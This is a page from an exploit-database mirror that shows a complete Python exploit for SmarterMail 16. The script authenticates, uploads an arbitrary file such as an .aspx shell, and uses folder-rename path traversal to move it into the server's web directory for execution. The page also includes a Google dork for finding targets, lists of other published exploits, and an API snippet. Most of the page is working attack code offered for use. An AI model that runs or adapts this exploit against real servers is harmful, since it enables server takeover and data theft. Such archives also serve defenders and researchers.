Search for hundreds of thousands of exploits

"SmarterMail 16 - Arbitrary File Upload"

Author

Exploit author

vvhack.org

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-06-12

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
# Exploit Title: SmarterMail 16 - Arbitrary File Upload
# Google Dork: inurl:/interface/root
# Date: 2020-06-10
# Exploit Author: vvhack.org
# Vendor Homepage: https://www.smartertools.com
# Software Link: https://www.smartertools.com
# Version: 16.x
# Tested on: Windows
# CVE : N/A

#!/usr/bin/python3
import requests, json, argparse
from requests_toolbelt.multipart.encoder import MultipartEncoder

#example usage:
#Authenticated
#python3 exp.py -w http://mail.site.com/ -f ast.aspx
#Change username & password !

class Tak:
 
  def __init__(self):
     self.file_upload()
     self.shell_upload()

  def loginned(self):
    self.urls = results.wbsn + '/api/v1/auth/authenticate-user'
    self.myobja = {"username":"mail@mail.com","password":"password","language":"en"}
    self.xx = requests.post(self.urls, data = self.myobja)
    self.data = json.loads(self.xx.text)
    self.das = self.data['accessToken']
    self.headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0', 'Authorization': "Bearer " + self.das}

  def loginned_folder(self):
    self.loginned()
    self.url = results.wbsn + '/api/v1/mail/messages'
    myobj = {"folder":"drafts","ownerEmailAddress":"","sortType":5,"sortAscending":"false","query":"","skip":0,"take":151,"selectedIds":[]}
    x = requests.post(self.url, data = myobj, headers=self.headers)
    print(x.text)

  def create_folder(self):
    self.loginned()
    self.urlz = results.wbsn + '/api/v1/filestorage/folder-put'
    myobj = {"folder": "testos1", "parentFolder":"Root Folder\\"}
    myobj2= {"folder": "testos2", "parentFolder":"Root Folder\\"}
    x = requests.post(self.urlz, data = myobj, headers=self.headers)
    x = requests.post(self.urlz, data = myobj2, headers=self.headers)
    print(x.text)

  def file_upload(self):
      self.create_folder()
      '''
      #resumableChunkNumber=1&
      #resumableChunkSize=2097152&resumableCurrentChunkSize=955319&resumableTotalSize=955319&
      #resumableType=image%2Fjpeg&resumableIdentifier=955319-112097jpg&resumableFilename=112097.jpg&
      #resumableRelativePath=112097.jpg&resumableTotalChunks=1", headers={'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
      #'Accept-Language': "en-US,en;q=0.5", 'Accept-Encoding': "gzip, deflate",
      #print(self.xz)
      #print(self.xz.headers)
      '''
      size = os.path.getsize(results.wbsf)
      print(size)
      replace_file = results.wbsf.replace(".","")
      with open(results.wbsf, "rb") as outf:
          contents = outf.read()
          multipart_data = MultipartEncoder(
          fields={
          "context": "file-storage",
          #"contextData": '{"folder":"Root Folder\\ " + str(results.wbsd) + "\\"}',
          "contextData": '{"folder":"Root Folder\\\\testos1\\\\"}',
          "resumableChunkNumber": "1",
          "resumableChunkSize": "2097152",
          "resumableCurrentChunkSize": str(size),
          "resumableTotalSize": str(size),
          "resumableType": "image/jpeg",
          #"resumableIdentifier": "955319-112097jpg",
          "resumableIdentifier": str(size) + "-" + str(replace_file),
          "resumableFilename": results.wbsf,
          "resumableRelativePath": results.wbsf,
          "resumableTotalChunks": "1",
          "file": (
              'blob',#112097.jpg',
               #open(file, "rb"),
               contents,
               #file,
               #"image/jpeg"
               "application/octet-stream"
               #'text/plain'
               )

        }
)
      '''    
      http_proxy = "http://127.0.0.1:8080"
      proxyDict = {
              "http"  : http_proxy,
            }
      '''      
      # if you want to activate intercept then add with that argument, this parameter is necessary requiresfunc(if you want to activate it, please remove it from the comment line.)  >> proxies=proxyDict
      self.dre = requests.post(url=results.wbsn + "/api/upload",headers={"Content-Type": multipart_data.content_type, 
      'Authorization': "Bearer " + self.das, 
      'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"},data=multipart_data) 

  def shell_upload(self):

   '''
   http_proxy = "http://127.0.0.1:8080"
   proxyDict = {
              "http"  : http_proxy,
   }
   '''

   json_data = {
           "folder": "Root Folder\\testos1\\",
           "newFolderName": "\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\program files (x86)\\SmarterTools\\SmarterMail\\MRS\\testos1\\",
           "parentFolder": "",
           "newParentFolder": "Root Folder\\testos2"
   }
   #r = requests.post('http://mail.site.com/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers, proxies=proxyDict)
   r = requests.post(results.wbsn+'/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers)
   print(results.wbsn + "/testos1/" + results.wbsf) 

if __name__ == '__main__':

   parser = argparse.ArgumentParser()
   parser.add_argument('-f', action='store', dest='wbsf',
                   help='Filename')
   parser.add_argument('-w', action='store', dest='wbsn',
                   help='Target')
   parser.add_argument('--version', action='version', version='SmartMail Knock Knock')
   results = parser.parse_args()

   tako = Tak()
   tako
Release DateTitleTypePlatformAuthor
2020-07-02"WhatsApp Remote Code Execution - Paper"webappsandroid"ashu Jaiswal"
2020-07-02"ZenTao Pro 8.8.2 - Command Injection"webappsphp"Daniel Monzón"
2020-07-02"OCS Inventory NG 2.7 - Remote Code Execution"webappsmultipleAskar
2020-07-01"Online Shopping Portal 3.1 - Authentication Bypass"webappsphp"Ümit Yalçın"
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
2020-07-01"PHP-Fusion 9.03.60 - PHP Object Injection"webappsphpcoiffeur
2020-07-01"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)"localwindows"Paras Bhatia"
2020-06-30"Reside Property Management 3.0 - 'profile' SQL Injection"webappsphp"Behzad Khalifeh"
2020-06-30"Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting"webappsphp"Anushree Priyadarshini"
2020-06-26"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path"localwindows"Ethan Seow"
Release DateTitleTypePlatformAuthor
2020-07-02"OCS Inventory NG 2.7 - Remote Code Execution"webappsmultipleAskar
2020-06-24"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting"webappsmultiple"William Summerhill"
2020-06-22"WebPort 1.19.1 - Reflected Cross-Site Scripting"webappsmultiple"Emre ÖVÜNÇ"
2020-06-22"Odoo 12.0 - Local File Inclusion"webappsmultiple"Emre ÖVÜNÇ"
2020-06-22"FileRun 2019.05.21 - Reflected Cross-Site Scripting"webappsmultiple"Emre ÖVÜNÇ"
2020-06-17"OpenCTI 3.3.1 - Directory Traversal"webappsmultiple"Raif Berkay Dincel"
2020-06-15"SOS JobScheduler 1.13.3 - Stored Password Decryption"remotemultiple"Sander Ubink"
2020-06-12"Sysax MultiServer 6.90 - Reflected Cross Site Scripting"webappsmultiple"Luca Epifanio"
2020-06-12"SmarterMail 16 - Arbitrary File Upload"webappsmultiplevvhack.org
2020-06-12"Avaya IP Office 11 - Password Disclosure"webappsmultiplehyp3rlinx
Release DateTitleTypePlatformAuthor
2020-06-12"SmarterMail 16 - Arbitrary File Upload"webappsmultiplevvhack.org
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48580/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.